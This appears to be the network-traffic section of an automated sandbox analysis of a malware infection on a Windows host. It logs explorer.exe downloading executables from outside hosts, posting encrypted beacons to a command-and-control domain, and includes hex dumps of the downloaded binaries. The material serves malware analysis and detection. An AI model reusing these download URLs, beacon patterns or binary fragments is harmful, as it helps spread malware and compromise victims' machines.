7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 aa 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 62 02 00 00 10 00 00 00 64 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 40 00 00 00 80 02 00 00 42 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 97 00 00 00 d0 02 00 00 86 00 00 00 aa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 a1 01 00 00 00 70 03 00 00 02 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 69 64 6f 78 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 6f 70 65 00 00 00 41 02 00 00 00 90 03 00 00 04 00 00 00 34 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 7d 01 00 00 a0 03 00 00 7e 01 00 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(8elYlYlYr}Yr>YrHYKpkYlYYrmYrmYrmYRichlYPEL6ddz#"@ `P}H.textbd `.rdata@Bh@@.data|@.tlsp0@.fidox2@.zopeA4@.rsrc}~8@@
                                                                                                                                                                    Jan 7, 2024 05:30:05.175288916 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 8d 44 24 08 50 8b f1 e8 fc 0a 00 00 c7 06 e4 81 42 00 8b
                                                                                                                                                                    Data Ascii: VD$PB^BVBD$tVY^D$L$D$P@u+UuuuuE]UuuuuE]jrB`uB
                                                                                                                                                                    Jan 7, 2024 05:30:05.405513048 CET1286INData Raw: 73 15 8b 46 14 3b f8 73 02 8b c7 50 6a 01 8b ce e8 24 fe ff ff eb 0c 85 ff 75 08 57 8b ce e8 93 ff ff ff 33 c0 3b c7 1b c0 5f f7 d8 5e c2 08 00 8b c1 c2 04 00 ff 74 24 04 e8 51 09 00 00 59 c2 08 00 ff 74 24 04 e8 d8 01 00 00 59 c2 04 00 6a 44 b8
                                                                                                                                                                    Data Ascii: sF;sPj$uW3;_^t$QYt$YjD&rBhBMkeEPM`hBEPEBfjtYt03j[Yt$YVt$B^jXj\rB}u
                                                                                                                                                                    Jan 7, 2024 05:30:05.405605078 CET1286INData Raw: 00 8d 45 d8 50 8d 4d b0 e8 c9 fe ff ff 68 50 ae 42 00 8d 45 b0 50 e8 d2 08 00 00 cc 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 67 f7 ff ff c7 06 fc 81 42 00 8b c6 5e 5d c2 04 00 8b ff 55 8b ec 56 ff 75 08 8b f1 e8 4a f7 ff ff c7 06 14 82 42 00 8b c6 5e
                                                                                                                                                                    Data Ascii: EPMhPBEPUVugB^]UVuJB^];BuUEVW3;tG9}u1j^0WWWWW)9}t9Esj"YPuu3_^]UEV3;uVVVVVG3@
                                                                                                                                                                    Jan 7, 2024 05:30:05.405706882 CET1286INData Raw: 8b f1 eb ad 6a 16 58 5f 5e 5d c3 8b ff 55 8b ec ff 75 08 51 e8 4c 2c 00 00 59 59 5d c2 04 00 8b ff 51 c7 01 a4 82 42 00 e8 2d 2d 00 00 59 c3 8b ff 55 8b ec 56 8b f1 e8 e3 ff ff ff f6 45 08 01 74 07 56 e8 3b ff ff ff 59 8b c6 5e 5d c2 04 00 8b ff
                                                                                                                                                                    Data Ascii: jX_^]UuQL,YY]QB--YUVEtV;Y^]UuQ-YY]Q,YUEQP.YY@]UEQP.YY]UEQP.YY3]ABVjhB
                                                                                                                                                                    Jan 7, 2024 05:30:05.405827999 CET1286INData Raw: ff 70 18 e8 df 42 00 00 83 c4 10 5d c2 04 00 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 27 f6 ff ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 b4 52 00 00 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec 38 53 81 7d 08 23 01 00 00
                                                                                                                                                                    Data Ascii: pB]UVuN3'jVvvjuvuR ^]U8S}#u$@M3@eE$@BM3EEEEEEEE EeeeemdEEdEEEEE7=EEPE0UYYe}t
                                                                                                                                                                    Jan 7, 2024 05:30:05.636045933 CET1286INData Raw: 4f 00 00 59 6a 00 ff 15 b8 80 42 00 68 d0 82 42 00 ff 15 b4 80 42 00 83 3d 70 56 43 00 00 75 08 6a 01 e8 95 4f 00 00 59 68 09 04 00 c0 ff 15 b0 80 42 00 50 ff 15 ac 80 42 00 c9 c3 cc cc cc cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1
                                                                                                                                                                    Data Ascii: OYjBhBB=pVCujOYhBPBUWVuM};v;r=$fCtWV;^_u^_]Our*$*@r$)@$*@$(*@)@)@*@#FGFG
                                                                                                                                                                    Jan 7, 2024 05:30:05.636105061 CET1286INData Raw: 59 43 00 e8 6c 31 00 00 59 c3 8b ff 55 8b ec 5d e9 99 fe ff ff 8b ff 55 8b ec ff 35 44 59 43 00 e8 4f 31 00 00 59 85 c0 74 03 5d ff e0 6a 02 e8 82 4a 00 00 59 5d e9 73 fe ff ff 33 c0 50 50 50 50 50 e8 ce ff ff ff 83 c4 14 c3 8b ff 55 8b ec 5d e9
                                                                                                                                                                    Data Ascii: YCl1YU]U5DYCO1Yt]jJY]s3PPPPPU]UE3;BtA-rHwjX]B]DjY;#]2uHB2uLBUVMQY0^]U2ujX]
                                                                                                                                                                    Jan 7, 2024 05:30:05.636177063 CET1286INData Raw: 89 7d e4 33 db 39 1d 48 59 43 00 75 18 e8 5c 23 00 00 6a 1e e8 84 21 00 00 68 ff 00 00 00 e8 4e 1e 00 00 59 59 8b 75 08 8d 34 f5 58 d2 42 00 39 1e 74 04 8b c7 eb 6e 6a 18 e8 4d 48 00 00 59 8b f8 3b fb 75 0f e8 48 fb ff ff c7 00 0c 00 00 00 33 c0
                                                                                                                                                                    Data Ascii: }39HYCu\#j!hNYYu4XB9tnjMHY;uH3QjYY]9u,hWGYYuW#Y]>WYEEjYUEV4XB>uP"YujBY6B^]=HYCu3
                                                                                                                                                                    Jan 7, 2024 05:30:05.637690067 CET1286INData Raw: 04 83 6d 08 14 a1 60 67 43 00 a3 68 67 43 00 8b 45 08 a3 a0 5a 43 00 89 3d 70 67 43 00 5b 5f 5e c9 c3 a1 6c 67 43 00 56 8b 35 5c 67 43 00 57 33 ff 3b f0 75 34 83 c0 10 6b c0 14 50 ff 35 60 67 43 00 57 ff 35 48 59 43 00 ff 15 e0 80 42 00 3b c7 75
                                                                                                                                                                    Data Ascii: m`gChgCEZC=pgC[_^lgCV5\gCW3;u4kP5`gCW5HYCB;u3xlgC5\gC`gCk5`gChAj5HYCBF;tjh hWBF;uvW5HYCBN>~\gCF_^UQQMASVqW3C}i
                                                                                                                                                                    Jan 7, 2024 05:30:05.637757063 CET1286INData Raw: 43 00 83 a4 88 c4 00 00 00 00 a1 a0 5a 43 00 8b 40 10 fe 48 43 a1 a0 5a 43 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 a0 5a 43 00 83 78 08 ff 75 48 83 3d 5c 67 43 00 01 7e 3f ff 70 10 6a 00 ff 35 48 59 43 00 ff 15 10 80 42 00 8b 0d 5c 67 43 00
                                                                                                                                                                    Data Ascii: CZC@HCZCHyCu`ZCxuH=\gC~?pj5HYCB\gCZCk`gC+LQHQP\gC%ZCU`gC8S3;u9\gCVWU]kB;gJMDMJM]]]uj@39]Y


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449775104.21.26.173802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:08.085190058 CET172OUTGET /order/tuc5.exe HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: hugo.topteamlife.com
                                                                                                                                                                    Jan 7, 2024 05:30:08.382399082 CET769INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:08 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 4707351
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Content-Description: File Transfer
                                                                                                                                                                    Content-Disposition: attachment; filename=tuc5.exe
                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                    Expires: 0
                                                                                                                                                                    Cache-Control: must-revalidate
                                                                                                                                                                    Pragma: public
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cwLkSOC1eCbvHLeH5E4x25Ob46oZUs4bkGmgyG94efD9UnG%2B2yjgsU%2F%2B1gKOsiGqrsSS8VOKej1jZc0TUtR3uSvRWzvoe6ArSuPKf731vw0XNElUxhKF6vGSnbAQDo5QZvGGN1lxgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 841976b4dadf32d3-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    Jan 7, 2024 05:30:08.382443905 CET1286INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68
                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                    Jan 7, 2024 05:30:08.382489920 CET1286INData Raw: 6f 64 41 64 64 72 65 73 73 11 00 3c 2a 40 00 0a 4d 65 74 68 6f 64 4e 61 6d 65 13 00 78 2a 40 00 0c 46 69 65 6c 64 41 64 64 72 65 73 73 15 00 c4 29 40 00 0e 44 65 66 61 75 6c 74 48 61 6e 64 6c 65 72 12 00 ac 28 40 00 0b 4e 65 77 49 6e 73 74 61 6e
                                                                                                                                                                    Data Ascii: odAddress<*@MethodNamex*@FieldAddress)@DefaultHandler(@NewInstance(@FreeInstanceTObject@@% @%@%@%@%@%@%@%(@%@%@%@%@%@%@%@%@
                                                                                                                                                                    Jan 7, 2024 05:30:08.382596970 CET1286INData Raw: 08 8b 7e 0c 03 fb 3b eb 76 02 8b dd 3b 7c 24 08 76 04 8b 7c 24 08 3b fb 76 1e 6a 04 68 00 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33 d2 89 10 eb 0a 8b 36 81 fe 3c c4 40 00 75 bc 83 c4 0c 5d 5f 5e 5b c3 8b c0 53 56 57 55 51 8b
                                                                                                                                                                    Data Ascii: ~;v;|$v|$;vjh+WS&uD$36<@u]_^[SVWUQ4$$+$A5<@8^~;$s$;s;vh@+WSu@6<@uZ]_^[@SVWUL@?]3;{,
                                                                                                                                                                    Jan 7, 2024 05:30:08.382704020 CET1286INData Raw: c3 90 8b 15 78 c4 40 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 78 c4 40 00 75 e8 c7 05 18 c4 40 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 a1 01 00 00 5b c3 83 fa 04
                                                                                                                                                                    Data Ascii: x@J;rJ;rx@u@3S|[|[@@|| SVt@+3t@
                                                                                                                                                                    Jan 7, 2024 05:30:08.382774115 CET1286INData Raw: 58 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 74 c4 40 00 8b 54 82 f4 85 d2 74 79 8b ca 8b c1 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0
                                                                                                                                                                    Data Ascii: X}yt@Tty B;uy5t@3|&y=t@D2uuFu0RE@@;l@J)l@=l@}l@3l@p@p@E
                                                                                                                                                                    Jan 7, 2024 05:30:08.382837057 CET1286INData Raw: fd ff ff 84 c0 74 05 89 5d fc eb 37 8b c6 e8 a3 fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 12 8b c8 8b d7 8b c3 e8 2d 01 00 00 8b c3 e8 fe fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 89 25 40 00 80 3d
                                                                                                                                                                    Data Ascii: t]7%;}t-}3ZYYdh%@=2@th@uE_^[Y]t@tjt@uRt2tP@Yt.@utP@Yt
                                                                                                                                                                    Jan 7, 2024 05:30:08.382908106 CET1286INData Raw: 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 89 cf 31 db 31 c9 8b 70 dc 85 f6 74 13 66 8b 0e 83 c6 02 3b 56 02 74 13 66 8b 1e 01 de 49 75 f3 8b 40 ec 85 c0 75 df 88 07 eb 0a 83 c6 06 31 c9 8a 0e 41 f3 a4 5f 5e
                                                                                                                                                                    Data Ascii: \2uIuF_^[SVW11ptf;VtfIu@u1A_^[SVW11Pptf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=@vj
                                                                                                                                                                    Jan 7, 2024 05:30:08.383018017 CET784INData Raw: 90 00 00 00 00 8b 0a 89 88 00 00 00 00 8b 42 08 e8 e5 f9 ff ff 5a 8b 64 24 2c 31 c0 59 64 89 08 58 5d e8 7b fc ff ff ff e2 c3 31 d2 8b 4c 24 08 8b 44 24 04 83 c1 05 64 89 02 ff d1 c2 0c 00 c3 8b c0 89 14 24 e9 cd 0e 00 00 c3 8d 40 00 55 8b ec 8b
                                                                                                                                                                    Data Ascii: BZd$,1YdX]{1L$D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"%RX]D$
                                                                                                                                                                    Jan 7, 2024 05:30:08.501636028 CET1286INData Raw: 10 85 d2 74 13 8b 4a f8 49 7c 0d 89 4a f8 75 08 8d 42 f8 e8 5a f3 ff ff c3 90 85 c0 7e 1c 50 83 c0 09 e8 33 f3 ff ff 83 c0 08 5a 89 50 fc c7 40 f8 01 00 00 00 c6 04 10 00 c3 31 c0 c3 90 53 56 57 89 c3 89 d6 89 cf 89 f8 e8 cc ff ff ff 89 f9 89 c7
                                                                                                                                                                    Data Ascii: tJI|JuBZ~P3ZP@1SVWt;_^[RZ1B1t!R:t:Jt:Jt:JtBBBZ)@t@t?SVWyV9tNT
                                                                                                                                                                    Jan 7, 2024 05:30:08.501678944 CET1286INData Raw: ee ff ff c3 b0 10 e9 c9 ee ff ff c3 31 d2 66 8b 10 f7 c2 00 40 00 00 75 1a 83 fa 08 72 15 81 fa 00 01 00 00 75 13 66 c7 00 00 00 83 c0 08 e9 25 fa ff ff 66 c7 00 00 00 c3 50 e8 b5 da ff ff c3 39 d0 74 6c 66 83 38 08 72 1b 50 52 66 81 38 00 01 74
                                                                                                                                                                    Data Ascii: 1f@uruf%fP9tlf8rPRf8tPZXf:sJHJHf:uRtJA~JfPfRPTT@USVWf;u;fEWjhVEP"t


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.44978391.215.85.120802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:27.080060959 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://bgipahlogkotrrb.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 354
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:27.080121040 CET354OUTData Raw: 48 9d 8c cf 4e 66 52 2e 5c 70 53 26 79 db 22 ca 21 68 99 14 f8 19 aa da b2 19 a5 8c 03 85 de 92 f9 ac 8e bf 74 44 90 b7 a4 28 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a3 19 b2 8a 14 62 cc d6 4f 96 a4 d1 3b dd
                                                                                                                                                                    Data Ascii: HNfR.\pS&y"!htD(j~_=;}f=B!bO;iR.ZVhAkRF-pR w_(#>25d<VY>|UO68qi@e>nj'9QL'.Po0!i14's\,7Z
                                                                                                                                                                    Jan 7, 2024 05:30:27.294107914 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                    Jan 7, 2024 05:30:27.301480055 CET288OUTPOST /index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ltilqlkbbnhbgnpd.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 182
                                                                                                                                                                    Host: selebration17io.io
                                                                                                                                                                    Jan 7, 2024 05:30:27.301542997 CET182OUTData Raw: 48 9d 8c cf 4e 66 52 2e 5c 70 53 26 79 db 22 ca 21 68 99 14 f8 19 aa da b2 19 a5 8c 03 85 de 92 f9 ac 8e bf 74 44 90 b7 a4 28 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 b3 8a 14 62 cd d6 4f 96 8c f9 50 b3
                                                                                                                                                                    Data Ascii: HNfR.\pS&y"!htD(j~_=;}f=B!bOPukF}ed1Gy'vJ2ymi:5#X_.K.:rW*
                                                                                                                                                                    Jan 7, 2024 05:30:27.515363932 CET255INHTTP/1.1 404 Not Found
                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    Data Raw: 34 33 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 48 db 45 83 1a 84 a0 4e f3 66 a3 72 1d 5a 63 a7 64 06 67 dd 00 7e 5a 28 80 af d0 ef 8c 20 c2 37 73 5e 36 b3 b6 bf f5 06 6e 92 24 2b a0 87 9b 6c 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 43Uys/~(`:HENfrZcdg~Z( 7s^6n$+l0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.4497845.42.66.0802580C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Jan 7, 2024 05:30:27.770375013 CET185OUTGET /288c47bbc187111b439df19ff4df68f076.exe HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: 5.42.66.0
                                                                                                                                                                    Jan 7, 2024 05:30:28.006428003 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                    Date: Sun, 07 Jan 2024 04:30:27 GMT
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Content-Length: 6775808
                                                                                                                                                                    Last-Modified: Wed, 03 Jan 2024 18:38:18 GMT
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    ETag: "6595a99a-676400"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9a a9 95 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 5a 67 00 00 08 00 00 00 00 00 00 3e 78 67 00 00 20 00 00 00 80 67 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 67 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 77 67 00 4b 00 00 00 00 80 67 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 67 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 58 67 00 00 20 00 00 00 5a 67 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 05 00 00 00 80 67 00 00 06 00 00 00 5c 67 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 67 00 00 02 00 00 00 62 67 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 78 67 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 62 67 00 c4 15 00 00 03 00 00 00 01 00 00 06 a8 27 00 00 81 3a 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 01
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELeZg>xg g@ g@wgKgHg H.textDXg Zg `.rsrcHg\g@@.relocgbg@B xgH,bg':g0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&*0/ssso,oo*
